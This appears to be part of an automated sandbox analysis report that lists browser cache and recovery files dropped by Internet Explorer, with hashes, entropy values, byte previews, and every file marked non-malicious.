                                        SHA1:19443A5F4B88F87C840B51485AC13F1861E35388
                                        SHA-256:D9778604E6C9A2A78B1C0CD4A870FC0512E874C06F13F7F08B7B8A02BCBDEE3D
                                        SHA-512:B4B633DDE5A02CDF04D55AD82642424122D64F489E0DB57BEE3079C3DEEFDA8E702BDF7B3456F419216B02993B59B63AD92281914808C40DA21FBF1B957448AF
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ABDA8A67-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):16984
                                        Entropy (8bit):1.5693511883858517
                                        Encrypted:false
                                        SSDEEP:48:IwPGcpriGwpa2G4pQWGrapbS6GQpBqGHHpczTGUpG:rFZKQG6YBSCjx2NA
                                        MD5:8BC960261C70FC42240DDA8DA39B3AA2
                                        SHA1:4936AE23EDB269DDACDDF401A2F3795AA1039194
                                        SHA-256:9757CA569D046D6CBFC001B254CB21375DE24A5C460ECA81AFFA3025312D3E7E
                                        SHA-512:AACC0068F076AA4BCCB2A0BE9D874B7841A4B3FE436FEE848F9B14E4612FB6265E6EDBB2A8ED4EA13A0796AA770E61CD4BB93DD5844EB3A12993F447FA7262C6
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ABDA8A69-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27444
                                        Entropy (8bit):1.8669764177537533
                                        Encrypted:false
                                        SSDEEP:96:rrZ8QM62BSWj92tWiM6W33VyNOx33Vyn3QNA:rrZ8QM62kWj92tWiM6W3FSOx3FUgNA
                                        MD5:F6C26927851D3856A2C32670DEC831B3
                                        SHA1:A5C17925E630BFA922EEDAA3703C0962F3DDC762
                                        SHA-256:68AAC5753A75797B2F7E2AA65770F0762235C07077DB66A7FA3D735402DC280D
                                        SHA-512:7EDAFA1486345846AE1D20CEFAB207B6CDD62F9C3C135F306F3ECA7C2F0CD25D69A68C360948C683237A750084171465252D6A5BCE2BB55E066FB0A178013D01
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ABDA8A6A-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):19032
                                        Entropy (8bit):1.5832873970840036
                                        Encrypted:false
                                        SSDEEP:48:IwPGcpryGwpaXG4pQXGrapbSwGQpKKG7HpRETGIpX20GApm:rFZ6QZ6rBS4AlTAFrg
                                        MD5:406105571938AF78DA4A542934F2C0AF
                                        SHA1:5727254801FC20C634B0D596F04ED544886E8DAA
                                        SHA-256:9A39162B37C0F38F5BF62633FB3FB213475EE322E9889DD95E203D354AAE9A9A
                                        SHA-512:AC8B7792579D5B66C745C17E67015CF55ABD7D4D34276770E1740C03A9EB10F094E325C39A4C5601695F6611CD1C510C01A3A090362E56CD201B548BBD92ADCE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ABDA8A6C-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):16984
                                        Entropy (8bit):1.5739616130679477
                                        Encrypted:false
                                        SSDEEP:48:Iw5GcprQGwpaR7G4pQpGrapbSwGQpBllGHHpcl8TGUpG:rfZ4QRd6JBS4jlo2l0A
                                        MD5:D099F77A8677C3ACD4CDD89445CD0EDE
                                        SHA1:096990181ED6C83828CF3FA51B80EACEDAA4C16B
                                        SHA-256:A5C041364AFE6D0C183EA33FEF931A1D2961F949943801D107CCDFF49356C5E2
                                        SHA-512:D6B1CBAB05444222D510B319F40993DAC022EFD5D7848C2AB4652195FC8ED6581B3DDBAFC7006492BC6E26AE003959BAE0E07F2A2264BC1CB09EE5D188FFCB83
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ABDA8A6E-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27392
                                        Entropy (8bit):1.8481283944195614
                                        Encrypted:false
                                        SSDEEP:96:rHZYQI6yBSPjg20WOMiKY+hfrPRY+hfrLA:rHZYQI6ykPjg20WOMiKDPRDLA
                                        MD5:48222DFE446ACED9840C42872B680857
                                        SHA1:015CF243725862E13E8E2797D4D348058597C933
                                        SHA-256:B80C378D6F9333E67FDEB3E35571014FD7A8AF7DB5ED50B362732ABC2B5FB2EB
                                        SHA-512:777144B8CA1926189BB576B60EA4C07BEAB2FC62E4F3B2D0FAFFE39B0A6F004F32EAD83C63D6E34D353C677601E98DEFFA781FD188DDB708A10B10FA202E16DF
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B2D93678-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27216
                                        Entropy (8bit):1.8566710772880282
                                        Encrypted:false
                                        SSDEEP:192:r6ZNQh6rkojF2zWoMca2i7UAYx2mi7U3A:rmS8wq8KNbbgE
                                        MD5:648989DA779F40589B6523C3835EEDAD
                                        SHA1:010C1188F513CA8AB5C7BEFF92F3B8DE5233754D
                                        SHA-256:51E4D5507F5F1B7AB482DC5A6B3658200E3C413FD1C8C008E1501253B786C518
                                        SHA-512:13AA62DD620D8B8B7F89185D85EE05BACBB19FC985B6459C561AA4514A115E0674DCD30493668FF17AA2E3C09C23CE94C65A3E812716236032FC5F3A56CC5224
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B2D9367B-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27404
                                        Entropy (8bit):1.8572823639685336
                                        Encrypted:false
                                        SSDEEP:192:rTZUQA6CkXjx2HWuMie+LObtv8x+LObt0pA:rVdr7Tg2HtfFEfj
                                        MD5:DDB7C72B2B1C8B2B5071F7A5565D896D
                                        SHA1:508C00D7367AA3A67D677F5E32314A1E1C047709
                                        SHA-256:57DA8C2AA237F6FD25BADDBD27E96E72925C97F6ED0BA7EA0A658EB6769F1649
                                        SHA-512:80DBBA7480D83EB8F6A1F16969E3645236BAF5348901D02EC54AE4EB96A11BC55ABDE6F0C12032795B4A3F951F3ED67CBE3CEED0A279DBCFB42CDA150CF3BBB3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B2D9367C-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):19032
                                        Entropy (8bit):1.5983526464503603
                                        Encrypted:false
                                        SSDEEP:48:IwrGcprqGwpaoG4pQoGrapbSrGQpBaGHHpcsTGUpQKNGcpm:rxZyQ462BSFjh2k6Ug
                                        MD5:CC0FE0FF58AE555D6656C15E677D54C0
                                        SHA1:6E384C2313C2830C32F8BAAADE358BC9B62206B5
                                        SHA-256:4DA66904C9D7605A78AF2DE03AD5EB4CAF7ECA60B973BBA03DDB5D0B8EFCB8D0
                                        SHA-512:A96DBEC54CBFFF31E69F5B6D6B6B73E33F0A6B35C67899B2BC84C174A46E9293F80C9A2040F8CB67BA90AB36C0C139C841BAB5FD4DFB1AD57736D2281E0EE3D6
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B2D9367E-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):19032
                                        Entropy (8bit):1.5986649966212345
                                        Encrypted:false
                                        SSDEEP:48:IwIGcprRGwpa2G4pQSGrapbSkGQpBxoGHHpc7TGUpQI9Gcpm:r8ZLQG6UBS8j52V6qg
                                        MD5:9F4A3AF3995F42AAEAE382092E9311D2
                                        SHA1:AA667B30303BC530E2F2E6DA9A54E25E3BF442D8
                                        SHA-256:1812AE11D447451E6756B21B57C16D5F0AEFD3B8B4A31A3F933B127F4E352B77
                                        SHA-512:100FB524336AD4F58E95B55185632A38358AA4BBE553BDFDC18EA2804DEC3DE346A3B7F8BE8712DE73EABA1240894FF9DA93B7031009F4156C10BAEA5DCFBB1E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C376A120-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):19032
                                        Entropy (8bit):1.5994990011009769
                                        Encrypted:false
                                        SSDEEP:48:Iw2GcprDGwpafG4pQHGrapbSSGQpBKGHHpcPTGUpQLXGcpm:rqZdQx6bBS6jR2Z65g
                                        MD5:1F421F839BBF29CAEFEE5CBEC2E5196A
                                        SHA1:F97343BE05CA4E4A0241221D420511DB28E18DBD
                                        SHA-256:85E11E77FF763117461C7884C2C09C121FBCF19DFF1B1236300E3C48843D751E
                                        SHA-512:A30EFEB5EFF6492078C0C9489F4DA999003BA807DFF39DC5BE133319928B855AF26D7D3E7561796F246AC90BAAEA74187AAAEF1EB8C052A12EF1051A8B00A2E3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C376A122-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27928
                                        Entropy (8bit):1.845594841204007
                                        Encrypted:false
                                        SSDEEP:96:r0ZHQv69BSpjh21WFMZS0+GGyvR0+GGy5+XJr:r0ZHQv69kpjh21WFMZSRGzvRRGzsZr
                                        MD5:4651C2F105BCCBA8410CE678679F1B0D
                                        SHA1:A6CF948D4AC230B4EF320ABCB3BC80F0959A0B1A
                                        SHA-256:1EEE98F97BCA82DB7694D56E342A43680F97A699B6E3C8DE59B6EFD9CC8A5BDB
                                        SHA-512:48BDA631B7E1ACB622A31E844864700BEFA88718845AE950F135E41B288E25D92DBAFF52F1FB7DC1B42D2B033BE9F73FA2395188D07A3803CB97A15EB6F0E8CE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D67A7CCD-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:modified
                                        Size (bytes):16984
                                        Entropy (8bit):1.5741886878119258
                                        Encrypted:false
                                        SSDEEP:48:IwFGcprEGwpaoG4pQMGrapbSrGQpBOGHHpcDTGUpG:rbZ8Q46KBSFjd2dA
                                        MD5:C37E7E25B5720A5BDE17831E9AE077DF
                                        SHA1:F9AFB370E0CD3876D93D541855A406B540BA67AF
                                        SHA-256:155A43009544CA7CBFC5BFF24D3B91B868CA3A350DE2C8B81901C83316C28454
                                        SHA-512:D265763710D03140A4F88CABA34E17047FDB0DDC07025EAC2F60B92C1557B468CDC8B93B7F29FF94994516D6154FE862DA566A40203692B7ADFD88A093B87E70
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):934
                                        Entropy (8bit):7.017170527854778
                                        Encrypted:false
                                        SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upG7On:u6tWu/6symC+PTCq5TcBUX4blOn
                                        MD5:DF8CCBBD66B03F497CEFE9D8F8A7F52F
                                        SHA1:482F587B4EB67EEDB562BF16DC9625F4506574F1
                                        SHA-256:2B9F8426386CB2AD99329C4A2291D6F4E225718FA1E4A03E9DB3C69FE8E6B320
                                        SHA-512:6496B7A39F5B2E8692853471418549036F9D73654AE31CFAED9F1C146E80DF93ED9A4E1B7504B8402701FA861831DB424C42BFADD59DA05CC32CF8E432D0C4C2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... .............;a......;a....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\17-361657-68ddb2ab[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):1238
                                        Entropy (8bit):5.066474690445609
                                        Encrypted:false
                                        SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                        MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                        SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                        SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                        SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\264bf325-c7e4-4939-8912-2424a7abe532[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                        Category:dropped
                                        Size (bytes):58885
                                        Entropy (8bit):7.966441610974613
                                        Encrypted:false
                                        SSDEEP:1536:Hj/aV3ggpq9UKGo7EVbG4+FVWC2eXNA6qQYKIp/uzL:Di3gyq9Ue7EVsCjeXuS
                                        MD5:FFA41B1A288BD24A7FC4F5C52C577099
                                        SHA1:E1FD1B79CCCD8631949357439834F331043CDD28
                                        SHA-256:AA29FA56717EA9922C3D85AB4324B6F58502C4CF649C850B1EC432E8E2DB955F
                                        SHA-512:64750B574FFA44C5FD0456D9A32DD1EF1074BA85D380FD996F2CA45FA2CE48D102961A34682B07BA3B4055690BB3622894F0E170BF2CC727FFCD19DECA7CCBBD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.............C....................................................................C.......................................................................,.,.."...........................................E.........................!...1."AQ.aq..#2.B.....$Rb...3...C...%&4.r..................................B.........................!1A.."Qa..2q.B.......#..Rr.$3b4....%CDc............?....]..l;.q.`.e...=..??n.\..).."..[K.W.u('$d$+.c...;.......R...(....N.~.J,g...-.....-H.[vI....n!.g......F... ...r..>%..*b.l...".....~7.k..s..r....u...0...)........x........4.(Ik...*EM.S...n4rN.V..88.J..~.....Q.FJ..A.D.-D.tk'?.F.......IY.]......O~=*3.N....rr.u( .....'.h}.,.......3[[...q.....g...&.O.....z...k.n.:~.)-S(..M....:.?(?.2206..g..."..S........~.#.........=.....~.<,G.............B..\l6..@Jr=...(.....N.....xi.....}...o.:F@$...>.N8..~........6e&51.Rzd$....A.l.lw..b..._.....t*b]|`.t.....w........KLp...'.F.?......_.........b.a..6T...P...HIRv.F..1..A.M......2:...C....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\2d-0e97d4-185735b[1].css
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):251398
                                        Entropy (8bit):5.2940351809352855
                                        Encrypted:false
                                        SSDEEP:3072:FaPMULTAHEkm8OUdvUvJZkrqq7pjD4tQH:Fa0ULTAHLOUdvwZkrqq7pjD4tQH
                                        MD5:24D71CC2CC17F9E0F7167D724347DBA4
                                        SHA1:4188B4EE11CFDC8EA05E7DA7F475F6A464951E27
                                        SHA-256:4EF29E187222C5E2960E1E265C87AA7DA7268408C3383CC3274D97127F389B22
                                        SHA-512:43CF44624EF76F5B83DE10A2FB1C27608A290BC21BF023A1BFDB77B2EBB4964805C8683F82815045668A3ECCF2F16A4D7948C1C5AC526AC71760F50C82AADE2B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: /*! Error: C:/a/_work/1/s/Statics/WebCore.Statics/Css/Modules/ExternalContentModule/Uplevel/Base/externalContentModule.scss(207,3): run-time error CSS1062: Expected semicolon or closing curly-brace, found '@include.multiLineTruncation' */....@charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .captio
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\52-478955-68ddb2ab[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):396665
                                        Entropy (8bit):5.323973786488522
                                        Encrypted:false
                                        SSDEEP:6144:YXP9M/wSg/jgyYZw44KfhmnidDWPqIjHSjalCr1BgxO0DkV4FcjtIuNK:CW/VonidDWPqIjHdg16tbcjut
                                        MD5:EBE291FBFB5808D09F5B5BE3D0A5A25E
                                        SHA1:7DAE03E3E55EEE92453095B5A4AE26A4F492AA6E
                                        SHA-256:FC248BEFAA53648F714231D548349AF87DBB3F2C283586BF441B0DF7E2A98E76
                                        SHA-512:8F069F360A2607B906D20A62A3EE04D9A19077812713A9CD6A4C79EC1EAEAAF04412A27F616D1C857D92F858039155A251E1CD09F8992457288383998C460C5B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: var awa,behaviorKey,Perf,globalLeft,Gemini,Telemetry,utils,data,MSANTracker,deferredCanary,g_ashsC,g_hsSetup,canary;window._perfMarker&&window._perfMarker("TimeToJsBundleExecutionStart");define("jqBehavior",["jquery","viewport"],function(n){return function(t,i,r){function u(n){var t=n.length;return t>1?function(){for(var i=0;i<t;i++)n[i]()}:t?n[0]:f}function f(){}if(typeof t!="function")throw"Behavior constructor must be a function";if(i&&typeof i!="object")throw"Defaults must be an object or null";if(r&&typeof r!="object")throw"Exclude must be an object or null";return r=r||{},function(f,e,o){function c(n){n&&(typeof n.setup=="function"&&l.push(n.setup),typeof n.teardown=="function"&&a.push(n.teardown),typeof n.update=="function"&&v.push(n.update))}var h;if(o&&typeof o!="object")throw"Options must be an object or null";var s=n.extend(!0,{},i,o),l=[],a=[],v=[],y=!0;if(r.query){if(typeof f!="string")throw"Selector must be a string";c(t(f,s))}else h=n(f,e),r.each?c(t(h,s)):(y=h.length>0,
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAKp8YX[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):497
                                        Entropy (8bit):7.3622228747283405
                                        Encrypted:false
                                        SSDEEP:12:6v/7YBQ24PosfCOy6itR+xmWHsdAmbDw/9uTomxQK:rBQ24LqOyJtR+xTHs+jUx9
                                        MD5:CD651A0EDF20BE87F85DB1216A6D96E5
                                        SHA1:A8C281820E066796DA45E78CE43C5DD17802869C
                                        SHA-256:F1C5921D7FF944FB34B4864249A32142F97C29F181E068A919C4D67D89B90475
                                        SHA-512:9E9400B2475A7BA32D538912C11A658C27E3105D40E0DE023CA8046656BD62DDB7435F8CB667F453248ADDCB237DAEAA94F99CA2D44C35F8BB085F3E005929BD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx..S=K.A.}{...3E..X.....`..S.A.k.l......X..g.FTD,....&D...3........^..of......B....d.....,.....P...#.P.....Y.~...8:..k..`.(.!1?......]*.E.'.$.A&A.F..._~.l....L<7A{G.....W.(.Eei..1rq....K....c.@.d..zG..|.?.B.)....`.T+.4...X..P...V .^....1..../.6.z.L.`...d.|t...;.pm..X...P]..4...{..Y.3.no(....<..\I...7T.........U..G..,.a..N..b.t..vwH#..qZ.f5;.K.C.f^L..Z..e`...lxW.....f...?..qZ....F.....>.t....e[.L...o..3.qX........IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAMqFmF[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):553
                                        Entropy (8bit):7.46876473352088
                                        Encrypted:false
                                        SSDEEP:12:6v/7kFXASpDCVwSb5I63cth5gCsKXLS39hWf98i67JK:PFXkV3lBKbSt8MVK
                                        MD5:DE563FA7F44557BF8AC02F9768813940
                                        SHA1:FE7DE6F67BFE9AA29185576095B9153346559B43
                                        SHA-256:B9465D67666C6BAB5261BB57AE4FC52ED6C88E52D923210372A9692A928BDDE2
                                        SHA-512:B74308C36987A45BC96E80E7C68AB935A3CC51CD3C9B4D0A8A784342B268715A937445DEB3AEF4CA5723FBC215B1CAD4E7BC7294EECEC04A2F1786EDE73E19A7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx....RQ......%AD.Vn$R...]n\.........Z..f.....\.A.~.f \H2(2.J.uT.i.u.....0P..s..}.....P..........l...*..P.....~...tb...f,.K.;.X.V...^..x<.b...lr8...bt.]..<.h.d2I.T2...sz...@.p8.x<..pH...g:...DX.Vt:.......eR..$...E.d2I..d..b.R.0...]. .j...v..A....j......H...=....@.'Z^....E|>..tZv".^...#l.[yk(.B<j..#.H..dp.\..m....."#...b.l6.7.-.Q...l6.<.#.H.....\|.....>/^.......eL.....9.z.....lwy....*.g..h?...<...zG...c\d......q.3o9.Y.3.|..Jg...%.t.?>....+..6.0.m.....X.q........IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AANT3y4[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:modified
                                        Size (bytes):28887
                                        Entropy (8bit):7.909497836335464
                                        Encrypted:false
                                        SSDEEP:768:IgaJ65BYqO+B1DOZFA3oZgD3iE+8wdlirV:IzoaqdOZ9grK8wdsrV
                                        MD5:CF05D5EA1D6AF4CABD89F2A00C0E8AD2
                                        SHA1:D9FB635C8CF27B6655B5A585F0F76D801B6E6423
                                        SHA-256:4F83E4BD355BDF6CC520A7868DA0DCB6EFCA840B20E5CAA51FC5F5F227EAE4BC
                                        SHA-512:D00256BF16B34B2962275187E5210450CFDC57C795CA8E0BBF06EDDA4BC4CCBB1589CFBBE8537B76F96FE9CEE84ED856C617E7AF787B698254F12BA70AF6068D
                                        Malicious:false
                                        Reputation:unknown
